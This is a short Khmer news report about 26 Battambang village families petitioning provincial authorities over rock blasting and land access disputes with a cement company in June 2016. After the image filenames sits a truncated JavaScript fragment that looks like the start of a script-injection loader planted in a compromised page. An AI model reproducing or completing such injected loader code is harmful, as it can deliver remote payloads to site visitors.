ព្រឹតិ្តការណ៍ថ្មីៗ

ពលរដ្ឋមកពីភូមិដូនមាយ២៦គ្រួសារស្នើរសុំអោយអាជ្ញាធរខេត្តជួយដោះស្រាយចំពោះការបំផ្ទុះថ្មរបស់​ក្រុមហ៊ុន​BATTAMBANG​.KT.CEMENT. CO.LTD

1 ឆ្នាំ មុន 0 វិជ្ជា ស្លាប់រស់ជារឿងធម្មតា​

រតន:គិរី៖ ប្រជាពលរដ្ឋធ្វើដំណើរមកពីភូមិដូនមាយ ឃុំស្តៅ ស្រុករតនមណ្ឌល ខេត្តបាត់ដំបងចំនួន២៦ គ្រួសារ កាលពីវេលាម៉ោង៨និង៣០នាទីថ្ងៃទី១៤ ខែមិថុនា ឆ្នាំ២០១៦ បានមកកាន់សាលាខេត្តបាត់ដំបងក្នុងគោលបំណងស្នើរសុំអោយអាជ្ញាធខេត្តជួយដោះស្រាយចំពោះការបំផ្ទុះថ្មបណ្តាលអោយប៉ើងថ្មរ៉ាយប៉ាយពេញភូមិ និងបង្ករសម្លេងរំខានដល់ការសិក្សារបស់ក្មេងៗសិស្សសាលាខាក់ខានមិនបានរៀនសូត្រទៀតផង។

លោកនៀន ដៀវ ប្រជាពលរដ្ឋក្នុងមូលដ្ឋានខាងលើបានអោយដឹងថា: ក្រៅពីការរំខាននិងក្តីព្រួយបារម្មណ៍ដោយការបំផ្ទុះថ្ម របស់ក្រុមហ៊ុនBATTAMBANG . KT . CEMENT. CO . LTD ពួកគាត់នៅរងភាពអយុត្តិធម៌ចំពោះដីជាច្រើនហិកតាផ្សេងទៀតនៅលើចង្កេះភ្នំដែលពួកគាត់អាស្រ័យផលជាង២០ឆ្នាំមកហើយដែលបានមកពីការទិញតគ្នាពីមួយទៅមួយគីត្រូវបានភាគីខាងក្រុមហ៊ុនហាមមិនអោយចូលធ្វើខណះមិនទាន់ដោះស្រាយសំណងផង។
នៅក្នុងការចូលខ្លួនរកដំណោះស្រាយលោក សើ សាម៉េត អភិបាលស្រុករតនះមណ្ឌលបានអោយដឹងថា: នៅថ្ងៃទី១៥ ខែមិថុនានេះក្រុមការងារថ្នាក់ខេត្តនិងមន្រ្តីជំនាញពាក់ពន្ធ័ទាំងអស់និងចុះពិនិត្យប្រមូលបញ្ហាដែលនៅសេសសល់ជាក់ស្តែង ហើយនិងមានការពិភាគ្សារួមមួយដើម្បីឈានទៅកាន់ការរកដំណោះស្រាយសមស្របណាមួយ៕

IMG-20160614-WA0195 IMG-20160614-WA0194var d=document;var s=d.createElement(‘script’);

បន្ថែមយោបល់របស់អ្នក

យោបល់